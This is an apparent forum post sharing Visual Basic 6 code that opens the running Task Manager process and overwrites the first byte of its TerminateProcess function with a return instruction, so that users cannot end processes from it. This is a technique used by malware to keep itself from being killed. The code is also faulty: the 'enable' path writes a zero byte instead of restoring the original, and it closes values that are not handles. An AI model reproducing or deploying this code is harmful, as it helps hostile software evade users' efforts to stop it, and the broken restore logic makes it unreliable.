[Amin_Mansouri]

Enable/Disable Task Manager with WriteProcessMemory

کد:

Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, lProcessID As Long) As Long
    Const TH32CS_SNAPPROCESS As Long = &H2
    Const PROCESS_ALL_ACCESS = &H1F0FFF
  
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long

Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
  
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long

Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Type PROCESSENTRY32
    dwSize As Long
    cntUseage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    swFlags As Long
    szExeFile As String * 1024
End Type

Public Function DisableTaskManager(Disable As Boolean) As Boolean
    Dim hSnapShot As Long, hAddress As Long, hProcess As Long, hWrite As Long
    Dim pe32 As PROCESSENTRY32
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) 'create snapshot of process
    pe32.dwSize = Len(pe32) 'get size of processentry32
    Process32First hSnapShot, pe32 'get info about first process
    Do While Process32Next(hSnapShot, pe32) <> 0 'loop through next processes until process found
        If InStr(1, LCase(pe32.szExeFile), LCase("TASKMGR.EXE")) > 0 Then 'process found
            hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, pe32.th32ProcessID) 'open process
            If hProcess <> 0 Then
                hAddress = GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "TerminateProcess") 'get base address
                If hAddress <> 0 Then
                    If Disable = True Then
                        hWrite = WriteProcessMemory(hProcess, ByVal hAddress, 195, 1, 0) 'disable
                    Else
                        hWrite = WriteProcessMemory(hProcess, ByVal hAddress, 0, 1, 0) 'enable
                    End If
                    If hWrite <> 0 Then
                        DisableTaskManager = True
                    End If
                    Call CloseHandle(hWrite)
                End If
                Call CloseHandle(hAddress)  'close base address
            End If
            Call CloseHandle(hProcess)  'close process
        End If
    Loop
    Call CloseHandle(hSnapShot)  'close snapshot
End Function


Sub Main()
    If DisableTaskManager(True) = True Then
        MsgBox "Enabled/disabled Task Manager"
    Else
        MsgBox "Could Not enable/disable Task Manager"
    End If
End Sub